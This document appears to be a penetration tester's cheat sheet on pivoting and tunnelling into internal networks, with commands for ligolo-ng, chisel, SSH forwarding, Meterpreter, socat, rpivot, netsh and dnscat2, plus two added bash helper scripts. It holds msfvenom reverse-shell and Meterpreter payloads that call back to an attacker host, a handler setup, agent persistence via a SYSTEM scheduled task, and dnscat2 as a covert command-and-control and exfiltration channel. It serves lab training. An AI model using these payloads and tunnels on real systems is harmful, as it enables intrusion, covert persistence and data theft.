Intrusionz3r0

Portforwarding and tunneling

Commands to enumerate internal networks

#Windows: ARP neighbours, reachability of one port on an internal host, WinRM availability, ARP cache and routing table
PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route print
#Linux: ARP cache and IPv4 routing table (a second interface or a non-default route reveals the internal subnet)
Intrusionz3r0X@htb[/htb]$ arp -n
Intrusionz3r0X@htb[/htb]$ route -4
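The commands above print the pivot's ARP cache and routing table, and the next step is always the same: pick out the subnets that are not the one you came in on and feed them to the ping sweep or to ligolo-ng. The script below is an added example (it is not code from the original page) that does that parsing on constructed `arp -n` and `ip route` output; the interface names ens192/ens224 and all addresses are assumptions chosen for the sample.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: derive the internal subnets
# reachable from a Linux pivot out of the text that `arp -n` and `ip route`
# print there, and turn them into ligolo-ng interface_add_route lines.
# Both samples are constructed; no real host was queried.

# Constructed `arp -n` output on a dual-homed pivot (ens192 is the side we came in on).
SAMPLE_ARP='Address                  HWtype  HWaddress           Flags Mask            Iface
10.129.202.1             ether   00:50:56:b9:01:02   C                     ens192
172.16.5.19              ether   00:50:56:b9:aa:bb   C                     ens224
172.16.5.35              ether   00:50:56:b9:cc:dd   C                     ens224
172.16.5.19              ether   00:50:56:b9:aa:bb   C                     ens224
192.168.210.9                    (incomplete)                              ens256'

# Constructed `ip route` output on the same pivot.
SAMPLE_ROUTE='default via 10.129.0.1 dev ens192 proto static
10.129.0.0/16 dev ens192 proto kernel scope link src 10.129.202.64
172.16.5.0/23 dev ens224 proto kernel scope link src 172.16.5.129'

# to_slash24 IP: the /24 that contains IP (the ARP cache shows neighbours, not masks)
to_slash24() {
    printf '%s\n' "$1" | awk -F. '{ printf "%s.%s.%s.0/24\n", $1, $2, $3 }'
}

# arp_subnets SKIP_IFACE < arp-output: /24s seen in the ARP cache, ignoring the
# interface we arrived through and entries that never resolved.
arp_subnets() {
    awk -v skip="$1" '
        NR > 1 && $NF != skip && $2 != "(incomplete)" &&
        $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print $1 }' |
    while read -r ip; do to_slash24 "$ip"; done | sort -u
}

# route_subnets SKIP_IFACE < ip-route-output: directly connected prefixes with
# their real mask, again excluding the default route and our entry interface.
route_subnets() {
    awk -v skip="$1" '$1 != "default" && $3 != skip && $1 ~ /\// { print $1 }' | sort -u
}

# ligolo_route_cmds TUN < subnets: one interface_add_route line per prefix
ligolo_route_cmds() {
    while read -r net; do
        printf 'interface_add_route --name %s --route %s\n' "$1" "$net"
    done
}

# On a real pivot replace the samples with:  arp -n | arp_subnets ens192  and  ip route | route_subnets ens192
printf '%s\n' "$SAMPLE_ARP"   | arp_subnets ens192   | ligolo_route_cmds ligolo
printf '%s\n' "$SAMPLE_ROUTE" | route_subnets ens192 | ligolo_route_cmds ligolo
```

The routing table is the better source when it exists (it carries the real mask, here a /23 that an ARP-only view would have split into /24s); the ARP cache still matters on hosts where the interesting subnet is only reachable through a gateway that the routing table does not show as directly connected.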

Ping Sweep

Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } }
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ligolo NG

#Start the proxy on the attack host; the agents connect back to this listener (-selfcert generates a self-signed certificate)
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443

#Create the TUN interface (inside the ligolo-ng proxy console)
ligolo-ng >> interface_create --name "ligolo"

#Run the agent on the pivot host and connect it to the proxy (-ignore-cert because of the self-signed certificate)
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert

#Select the agent session to work with
ligolo-ng >> session

#Check the pivot's network configuration and identify the internal subnet
ligolo-ng >> ifconfig

#Route that subnet through the TUN interface (inside the proxy console)
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24

#Start the tunnel
ligolo-ng >> tunnel_start --tun ligolo

Configure double pivoting

For each additional pivot, create a new interface and add a route for the subnet it reaches: /24 for the whole subnet or /32 for a single host.

Note: the --addr port of the listener must be incremented by one for each additional pivot (11601, 11602, ...) so that every tunnel keeps its own listener and they stay easy to manage.

#Create a new interface for the second pivot (inside the proxy console)
ligolo-ng >> interface_create --name "ligolo2"

#Add a listener on the first pivot's agent: it binds --addr on that pivot and forwards to --to on the proxy side
#--to must be the port the proxy really listens on (443 with the -laddr used above; 11601 is only the ligolo-ng default)
ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list
#The second agent connects to the first pivot's internal address on the listener's --addr port
Target@htb[/htb]$ ./agent -connect <subnet-ip-address-previous-pivot>:11601 -ignore-cert

#Switch to the new session
ligolo-ng >> session

#Check the network configuration and identify the subnet behind the second pivot
ligolo-ng >> ifconfig

#Start the second tunnel
ligolo-ng >> tunnel_start --tun ligolo2

#Route the new subnet (or a single host with /32) through it (inside the proxy console)
ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx

For unstable sessions, launch the agent detached from the shell you got it from:

#Windows (run from PowerShell): a scheduled task that starts the agent as SYSTEM one minute from now; the date expression is wrapped in $() so PowerShell evaluates it before handing it to schtasks
schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st $((Get-Date).AddMinutes(1).ToString("HH:mm")) /ru SYSTEM
#Linux: nohup plus the trailing & keeps the agent running after the shell dies
nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1 &

Chisel

#The chisel server on the pivot listens on port 1234 with the SOCKS5 proxy enabled (--socks5); the client on the attack host opens a local SOCKS listener (127.0.0.1:1080 by default) whose traffic exits from the pivot, so every network the pivot can reach becomes reachable through it
target@WEB01:~$ ./chisel server -v -p 1234 --socks5
Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks

#If a firewall blocks inbound connections to the pivot, use reverse mode: the server runs on the attack host, the pivot connects out, and R:socks opens the SOCKS listener on the attack host
Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks

Chisel double pivoting

Kali Linux:

#Set up the reverse server on the attack host
❯ ./chisel server --reverse --socks5 -p 9001 -v #Intrusionz3r0 Machine

Modify the proxychains configuration (/etc/proxychains.conf or /etc/proxychains4.conf, depending on the package):

#Add one entry at a time, only once its chisel hop is up: in strict_chain mode proxychains fails if any listed proxy is unreachable
#Each hop is reached THROUGH the previous one, so the second 127.0.0.1:1090 is the loopback of pivot host 1 (where the R:1090:socks listener below lives), not the attack host
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090

#Close any other SOCKS4 proxy that would be chained (e.g. an SSH dynamic port forward) and comment out the default Tor entry
#socks4 127.0.0.1 9050

Pivot Host:

#Reverse SOCKS back to the attack host (opens 127.0.0.1:1080 on Kali), then a second reverse server for the next hop
PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe client -v myip:9001 R:socks 
PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe server -v -p 9002 --reverse --socks5

Pivot Host 2:

#Connects to pivot host 1 and opens a SOCKS listener on pivot host 1's port 1090 whose traffic exits from pivot host 2
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\chisel.exe client PivotHostIP:9002 R:1090:socks 
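The proxychains part of the procedure above is where double pivots usually break: a hop added before its listener exists, the stock Tor entry left in the chain, or a chain mode other than strict_chain. The helpers below are an added example, not code from the original page; they edit a proxychains config file passed as an argument and demonstrate the same two-hop chain on a scratch copy, so nothing under /etc is touched.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: helpers that edit the
# proxychains configuration the way the double pivot above needs it. The file
# format ([ProxyList] section holding "type host port" lines) is proxychains'
# own; the demo data at the bottom is constructed.

# proxychains_disable_default CONF: comment out the stock "socks4 127.0.0.1 9050" line
proxychains_disable_default() {
    conf=$1
    awk '/^socks4[[:space:]]+127\.0\.0\.1[[:space:]]+9050/ { print "#" $0; next } { print }' "$conf" \
        > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# proxychains_add_hop CONF HOST PORT: append a socks5 hop, idempotently, at the end of
# [ProxyList]. Order matters: proxychains connects to hop N+1 through hop N, so for the
# double pivot 127.0.0.1:1090 is dialled from the first pivot, not from Kali.
proxychains_add_hop() {
    conf=$1; host=$2; port=$3
    host_re=$(printf '%s' "$host" | sed 's/\./\\./g')
    if grep -qE "^socks5[[:space:]]+${host_re}[[:space:]]+${port}\$" "$conf"; then
        return 0
    fi
    printf 'socks5 %s %s\n' "$host" "$port" >> "$conf"
}

# proxychains_chain CONF: print the active hops in the order proxychains will use them
proxychains_chain() {
    awk '/^\[ProxyList\]/ { inlist = 1; next }
         inlist && /^(socks4|socks5|http)[[:space:]]/ { print }' "$1"
}

# proxychains_is_strict CONF: the chain above only works in strict_chain mode;
# dynamic_chain would silently skip a dead hop and random_chain reorders them.
proxychains_is_strict() {
    grep -qE '^strict_chain' "$1" && ! grep -qE '^(dynamic_chain|random_chain|round_robin_chain)' "$1"
}

# Demo on a scratch copy; on Kali run the same functions against
# /etc/proxychains4.conf (or /etc/proxychains.conf) as root.
demo_conf=$(mktemp)
printf 'strict_chain\nproxy_dns\n[ProxyList]\nsocks4 127.0.0.1 9050\n' > "$demo_conf"
proxychains_disable_default "$demo_conf"
proxychains_add_hop "$demo_conf" 127.0.0.1 1080    # once the first R:socks is up
proxychains_add_hop "$demo_conf" 127.0.0.1 1090    # once R:1090:socks is up
proxychains_chain "$demo_conf"
rm -f "$demo_conf"
```

Run `proxychains_chain` after each hop is added and test with something cheap (`proxychains curl -sI http://<internal-host>/`) before adding the next one; if the chain prints two hops but the connection fails, the second chisel listener is the first thing to check.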

Scan the entire IP list one line

#The pivot usually has no nmap, so drop a static binary on it
Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt 
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
#Full TCP port scan of every alive host, one grepable (-oG) file per host. -Pn -n skip host discovery and DNS; -T5 --min-rate 3000 is fast and noisy, fine for a lab, not for an engagement where detection matters
Target@htb[/htb]$ while read -r ip; do ./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" "$ip"; done < alive_host.txt

Local Port Forwarding over SSH

#Local port forwarding over SSH: 127.0.0.1:1234 on the attack host reaches port 3306 on the pivot ("localhost" is resolved on the pivot side), and several -L forwards can be stacked in one session
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

#Dynamic port forwarding: a SOCKS proxy on 127.0.0.1:9050 (the default proxychains port) whose traffic exits from the pivot
Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64 

Remote/Reverse Port Forwarding with SSH

#Remote/Reverse port forwarding with SSH: the payload calls back to the pivot's internal IP on 8080, and sshd on the pivot relays that connection to the handler on the attack host (port 8000)
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
msf6 exploit(multi/handler) > run

#-R <pivot-internal-ip>:8080 makes sshd on the pivot listen there and relay to 0.0.0.0:8000 on the attack host. Binding a non-loopback address on the pivot needs "GatewayPorts yes" (or clientspecified) in its sshd_config, otherwise sshd binds 127.0.0.1 only and the callback never arrives. -N opens no shell, -v shows the forward being set up
Intrusionz3r0X@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

#Execute the payload on the internal host

Meterpreter Tunneling & Port Forwarding


#Meterpreter Tunneling & Port Forwarding: the pivot runs a Meterpreter payload that calls back to the attack host
Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=8080 -f elf -o backupjob

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
#Background the session with ctrl+z

#Configuring MSF's SOCKS proxy (version 4a, so the proxychains entry must be "socks4 127.0.0.1 9050")
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run

#Creating routes with AutoRoute: traffic for 172.16.5.0/24 (NETMASK defaults to 255.255.255.0) is sent through session 1
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run

#It is also possible to add routes with autoroute by running it from the Meterpreter session (here with an explicit /23)
meterpreter > run autoroute -s 172.16.5.0/23

#Listing active routes with AutoRoute
meterpreter > run autoroute -p

#Port forwarding: 127.0.0.1:3300 on the attack host reaches RDP (3389) on 172.16.5.19
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
#Reverse port forwarding: port 1234 on the pivot is relayed to 10.10.14.18:8081 on the attack host
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

#Starting a Socat listener on the pivot: whatever connects to <intermediaryHostPort> is relayed to the attack host
ubuntu@Webserver:~$ socat TCP4-LISTEN:<intermediaryHostPort>,fork TCP4:10.10.14.18:<AttackhostPort>

#Socat reverse shell relay: the internal target connects to the pivot's internal IP (172.16.5.129) on 8080 and socat hands the connection to the handler on 10.10.14.18:443
target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 LPORT=8080 -f exe -o exploit.exe

SSH Pivoting with Sshuttle

#sshuttle only needs SSH access and a python interpreter on the pivot; it adds local firewall rules for <ip-range> so no proxychains is needed, which is why it runs with sudo
Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle
Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 <ip-range> -v 

RPivot

Intrusionz3r0X@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git
Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7

#Alternative to install python2.7 (rpivot is Python 2 only)
Intrusionz3r0X@htb[/htb]$ curl https://pyenv.run | bash
Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ source ~/.bashrc
Intrusionz3r0X@htb[/htb]$ pyenv install 2.7
Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7

#Running server.py from the attack host: the pivot connects to 9999 and the SOCKS proxy for proxychains is exposed on 9050
Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

#Running client.py on the pivot to build the SOCKS tunnel back to the server
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
#NTLM authentication (if the pivot can only reach the outside through an HTTP proxy that requires NTLM)
ubuntu@WEB01:~/rpivot$ python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

#Listen on the pivot's external IP (10.129.15.150:8080) and relay to RDP on the internal host 172.16.5.25; needs an elevated prompt, and the Windows firewall must allow 8080 inbound if it is enabled
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

Dnscat2 tunnels data through the DNS protocol over an encrypted command-and-control channel. The client on the compromised host sends queries for names under a domain you control (or straight to your server's IP) and the server carries its side of the conversation in the responses, by default in TXT, CNAME and MX records. Because the traffic rides the organisation's own resolvers, it gets out of networks where only DNS is allowed and is not caught by firewalls or intrusion detection systems that do not inspect DNS, which makes it useful both for exfiltration and for keeping covert control of a host whose other egress is blocked.

Intrusionz3r0X@htb[/htb]$ git clone https://github.com/iagox86/dnscat2.git
#Start the server (from the server/ directory); add --secret=<secret> if the client will use a pre-shared secret as below
Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

#dnscat2 client for Windows (PowerShell)
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/lukebaggett/dnscat2-powershell.git
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

ICMP Tunneling

#Build the Go-based tunnel binary statically linked (external linker, -static) so it runs on the pivot host regardless of its libc
go build --ldflags '-linkmode external -extldflags "-static"'


Last updated 7 days ago

Socat build for Windows: https://github.com/tech128/socat-1.7.3.0-windows